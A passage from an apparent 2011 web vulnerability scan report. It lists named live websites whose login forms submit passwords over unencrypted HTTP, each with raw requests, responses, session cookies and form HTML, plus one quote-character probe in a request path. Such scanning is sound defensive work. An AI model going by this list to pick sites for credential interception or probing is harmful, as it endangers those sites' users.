Host: community.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 16 Apr 2011 13:57:24 GMT
Server: community.martindale.com 999 138.12.88.54:26020
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Telligent-Evolution: 5.0.40623.6204
Location: /SignIn.aspx?ReturnUrl=%2fthemes%2fmhc%2fpages%2fUpgradeAccount.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:24 GMT; expires=Sun, 15-Apr-2012 13:57:24 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:24 GMT; expires=Sun, 15-Apr-2012 13:57:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5wefmq55kxgfut55o4gat3ul; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 62170
Connection: close
X-RE-Ref: 1 -1983794703
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSignIn.aspx%3fReturnUrl%3d%252fthemes%252fmhc%252fpages%252fUpgradeAccount.aspx">here</a>.</h2>
</body></html>

...[SNIP]...
<div align="center">
<form name="aspnetForm" method="post" action="/upgrade-your-connected-account.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl00$fragment_d98c0d41_7b1e_4073_b418_3403d8759dfa$ctl00$txtFlyOutPassword" type="password" maxlength="20" id="ctl00_fragment_d98c0d41_7b1e_4073_b418_3403d8759dfa_ctl00_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://tbe.taleo.net
Path:   /NA8/ats/careers/jobSearch.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://tbe.taleo.net/NA8/ats/careers/applicantView.jsp;jsessionid=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm?org=QUALYS&cws=7. The form contains the following password field: cwsPassword

Request

GET /NA8/ats/careers/jobSearch.jsp?org=QUALYS&cws=7 HTTP/1.1
Host: tbe.taleo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:04:30 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm; Path=/NA8/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12210


<html><head><title>Career Opportunities</title></head><body>
<STYLE type="text/css">
body {
padding: 15px;
font-family: Verdana;
font-siz
...[SNIP]...
<tr>
<form action='http://tbe.taleo.net/NA8/ats/careers/applicantView.jsp;jsessionid=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm?org=QUALYS&cws=7' method='post' name='loginForm'>
<input type='hidden' name='org' value='QUALYS'>
...[SNIP]...
<td nowrap colspan=4><input tabIndex='22' type='password' name='cwsPassword' maxlength=50 size=40></td>
...[SNIP]...

7.4. http://www.100zakladok.ru/save/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.100zakladok.ru/save/ (the form's action is "./", which resolves to the page itself). The form contains the following password field: lp

Request

GET /save/ HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:34 GMT
Server: Apache
Last-Modified: Sat, 12 Feb 2011 18:33:42 GMT
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8554

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<br>
<form action="./" method="post">
<table class="s80">
...[SNIP]...
<td><input type="password" name="lp" size="20" maxlength="32" class="inp"> <a href="/forgot/" class="t">
...[SNIP]...

7.5. http://www.2linkme.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.2linkme.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.2linkme.com/? (the form's action is "?", which resolves to the page itself). The form contains the following password field: password

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44109
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAATQQBDC=IJOIFKMAMAABEBNNNAPNFBNC; path=/
Date: Sun, 17 Apr 2011 14:20:09 GMT
Connection: close


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="it" >
<head>
<meta name="verify-v1" content="yNECeZAlEb/41nI6IfpxFB/WLGtIjqwE
...[SNIP]...
<div style="margin-top:0px; top:0px; position: absolute; width:100%;">
   <form action="?" method="post" name="Login" >
       <div style="border-bottom:1px; border-bottom-color:#FF0000; border-bottom-style:solid; background-color:#FF0000; background-image:url(images/sfondo_Search_Rosso.gif); height:35px; margin:0px; paddi
...[SNIP]...
<input class="in" type="text" name="email" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="email" onChange="document.Login.user.value=this.value;" />&nbsp;
               password:&nbsp;<input class="in" type="password" name="password" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="Password" />&nbsp;
               <input type="submit" value="Accedi" class="search" style="font-size:12px;" />
...[SNIP]...

7.6. http://www.adifni.com/account/bookmark/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adifni.com
Path:   /account/bookmark/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.adifni.com/account/bookmark/ (the form has no action attribute, so it submits to the page itself). The form contains the following password field: login_user_pass

Request

GET /account/bookmark/ HTTP/1.1
Host: www.adifni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ccqnqbgksfaosa21l0runj1bl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" >

...[SNIP]...
<table width="100%">

<form method="POST"><input type="hidden" name="PHPSESSID" value="ccqnqbgksfaosa21l0runj1bl0" />
...[SNIP]...
<td>

<input type="Password" name="login_user_pass" value="" maxlength="18" style="width:100%;">

</td>
...[SNIP]...

7.7. http://www.adifni.com/account/bookmark/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adifni.com
Path:   /account/bookmark/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.adifni.com/account/bookmark/ (the form has no action attribute, so it submits to the page itself). The form contains the following password field: login_user_pass

Request

GET /account/bookmark/ HTTP/1.1
Host: www.adifni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ccqnqbgksfaosa21l0runj1bl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" >

...[SNIP]...
<table width="100%">

<form method="POST"><input type="hidden" name="PHPSESSID" value="ccqnqbgksfaosa21l0runj1bl0" />
...[SNIP]...
<td>

<input type="Password" name="login_user_pass" value="" maxlength="18" style="width:100%;">

</td>
...[SNIP]...

7.8. http://www.arto.com/section/user/login/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/user/login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.arto.com/section/user/login/?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx. The form contains the following password field: ctl00$ctl00$Main$SiteTopBar$ArtoLoginBox$PasswordTextbox

Request

GET /section/user/login/?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx HTTP/1.1
Host: www.arto.com
Proxy-Connection: keep-alive
Referer: http://burp/show/53
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0cj2vqxnas50saq4rab4bmqt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:59:22 GMT
Content-Length: 39957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<body id="BodyTag" class=" defaultPage ">
<form method="post" action="?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
</span>
           <input name="ctl00$ctl00$Main$SiteTopBar$ArtoLoginBox$PasswordTextbox" type="password" maxlength="20" id="Main_SiteTopBar_ArtoLoginBox_PasswordTextbox" tabindex="2" class="navInput" size="13" />&nbsp;<span>
...[SNIP]...

7.9. http://www.auditmypc.com/firewall-test.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditmypc.com
Path:   /firewall-test.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.auditmypc.com/firewall-test.asp. The form contains the following password field: txtLPassword

Request

GET /firewall-test.asp HTTP/1.1
Host: www.auditmypc.com
Proxy-Connection: keep-alive
Referer: http://www.auditmypc.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:58:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b360041c54d2cdb95c517eb06e24f89e; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 23686

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Firewall Test - Free Internet Security Testing</title>
<meta name="Author" content="AuditMyPC.com" />
<meta name="K
...[SNIP]...
</p>
       <form action="/firewall-test.asp" method="post" id="frmLogin">
           <table>
...[SNIP]...
<td><input type="password" name="txtLPassword" id="txtLPassword" class="textbox validate['required']" size="16" maxlength="255" value="" /></td>
...[SNIP]...

7.10. http://www.bookmark.it/bookmark.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmark.it
Path:   /bookmark.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.bookmark.it/accesso.php. The form contains the following password field: pass

Request

GET /bookmark.php HTTP/1.1
Host: www.bookmark.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 15:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=15308d1c397501336fd8be9c10c798d7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
<td width="39%" height="80" align="right"> <FORM name=f method=post action="http://www.bookmark.it/accesso.php">
<LABEL for=username>
...[SNIP]...
</LABEL>
<INPUT class=text
type=password size=8 name=pass>

<INPUT type=submit value=Entra name=login class=bottone>
...[SNIP]...

7.11. http://www.bookmark.it/bookmark.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmark.it
Path:   /bookmark.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.bookmark.it/accesso.php. The form contains the following password field: pass

Request

GET /bookmark.php HTTP/1.1
Host: www.bookmark.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 15:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=15308d1c397501336fd8be9c10c798d7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
<BR> <FORM name=f method=post action="http://www.bookmark.it/accesso.php">
<LABEL for=username>
...[SNIP]...
</LABEL>
<INPUT class=text
type=password size=8 name=pass>
<BR>
...[SNIP]...

7.12. http://www.bookmerken.de/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmerken.de
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.bookmerken.de/loginajax.php. The form contains the following password field: password

Request

GET / HTTP/1.1
Host: www.bookmerken.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:17:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=d66a2987255db43846a89be39f125365; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6392
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bookmerken | Seiten
...[SNIP]...
<div class="box" id="regbox">
               <form id="regform" method="post" action="loginajax.php">
                   <fieldset>
...[SNIP]...
</label>
                       <input id="password" name="password" type="password" value="" maxlength="20" /><br />
...[SNIP]...

7.13. http://www.brainify.com/Bookmark.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brainify.com
Path:   /Bookmark.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.brainify.com/Bookmark.aspx. The form contains the following password field: textPassword

Request

GET /Bookmark.aspx HTTP/1.1
Host: www.brainify.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vghtpm45azchql55jeuls445; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Brainify - Boo
...[SNIP]...
<body style="background: #FFFFFF url(App_Themes/Default/Images/n2.gif) repeat-x scroll 0 1px;
margin: auto; width: 850px;" onload="self.focus();">
<form name="aspnetForm" method="post" action="Bookmark.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" style="min-height: 10em; display: table-cell;
vertical-align: middle; width: 850px; height: 560px;">

<div>
...[SNIP]...
</label>
<input name="textPassword" type="password" id="textPassword" tabindex="2" style="width:200px;" />
</div>
...[SNIP]...

7.14. http://www.cirip.ro/post/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cirip.ro
Path:   /post/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.cirip.ro/post?url=&bookmark=. The form contains the following password field: entered_password

Request

GET /post/ HTTP/1.1
Host: www.cirip.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=20db396305a6b7733789ee1f379e1df3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60, private, proxy-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34739

... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cirip.ro
...[SNIP]...
</table>
<form id="frmLogin" name="frmLogin" action="http://www.cirip.ro/post?url=&bookmark=" method="post">
<span class="sidebar_text">
...[SNIP]...
<br/>
<input name="entered_password" class="txtfield" size="20" type="password">
</span>
...[SNIP]...

7.15. http://www.classicalplace.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classicalplace.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.classicalplace.com/. The form contains the following password field: pwd

Request

GET / HTTP/1.1
Host: www.classicalplace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:21 GMT
Server: Apache/2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=498c85a46e9fdd709306cc8ac3b33a7f; path=/
Set-Cookie: PHPSESSID=4e4cee578a4d6be3e988777fbbfb6ce3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<form id="loginForm" name="loginForm" method="post" action="http://www.classicalplace.com/" onsubmit="return onLogin();" style="margin:0px;">

<table width="243" height="254" border="0" cellpadding="0" cellspacing="0" style="background:url(template/loginbox/cp_loginbox.gif) no-repeat;">
...[SNIP]...
<td align="center" valign="middle" style="padding-right:7px;"><input class="inputLogin" type="password" name="pwd" id="pwd" style="width:140px;" /></td>
...[SNIP]...

7.16. http://www.colivia.de/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.colivia.de/login.php. The form contains the following password field: password

Request

GET /login.php?return=/submit.php/1%22 HTTP/1.1
Host: www.colivia.de
Proxy-Connection: keep-alive
Referer: http://www.colivia.de/submit.php/1%22
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a21b075ab6ae7b749402f3acf5846f94; __utmz=79796357.1303061456.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/58; __utma=79796357.687729609.1303061456.1303061456.1303061456.1; __utmc=79796357; __utmb=79796357.1.10.1303061456

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:51:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 8302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<div class="login-left">
<form action="/login.php" id="thisform" method="post">
   <h2>
...[SNIP]...
<br />
           <input type="password" name="password" class="login" tabindex="11" /><br />
...[SNIP]...

7.17. http://www.colivia.de/submit.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.colivia.de/login.php?return=/submit.php. The form contains the following password field: password

Request

GET /submit.php HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:26 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=f3473b1d0baded99c1bbe6cc0b0fe982; path=/
Connection: close
Content-Type: text/html
Content-Length: 13673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<div class="boxcontent">
   <form action="/login.php?return=/submit.php" method="post">
           Benutzername:<br />
...[SNIP]...
<br /><input type="password" name="password" class="login" tabindex="41" /><br />
...[SNIP]...

7.18. http://www.diglog.com/submit.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diglog.com
Path:   /submit.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.diglog.com/submit.aspx (the form's action attribute is empty, so it submits to the page itself). The form contains the following password field: ctl00$ContentPlaceHolder1$tbPassword

Request

GET /submit.aspx HTTP/1.1
Host: www.diglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bpz3gqbfydia0f5514loz055; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 40697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head id="ct
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action id="aspnetForm" enctype="multipart/form-data">
<div>
...[SNIP]...
<input name="ctl00$ContentPlaceHolder1$tbLoginName" type="text" id="ctl00_ContentPlaceHolder1_tbLoginName" />
......:<input name="ctl00$ContentPlaceHolder1$tbPassword" type="password" id="ctl00_ContentPlaceHolder1_tbPassword" />
&nbsp;&nbsp;......<a href="Register.aspx?from=submit" target="_blank" class="new_window">
...[SNIP]...

7.19. http://www.drimio.com/drimthis/index

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.drimio.com
Path:   /drimthis/index

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.drimio.com/login. The form contains the following password field: login_password

Request

GET /drimthis/index HTTP/1.1
Host: www.drimio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=2qtnujia5q1hqgs4svqlkp619644moos; path=/; domain=.drimio.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="icon" href="http://static.drimio.n
...[SNIP]...
<li class="form_login" style="display:none;">
       <form name="form_login" id="form_login" action="http://www.drimio.com/login" method="post">
           <ul>
...[SNIP]...
</label>
                   
                   <input type="password" name="login_password" id="login_password" tabindex="2" />
               </li>
...[SNIP]...

7.20. http://www.embarkons.com/sharer.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.embarkons.com/sharer.php (the form has no action attribute, so it submits to the page itself). The form contains the following password field: password

Request

GET /sharer.php HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=gbg770phnl6gp5f4qddlhef3v6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
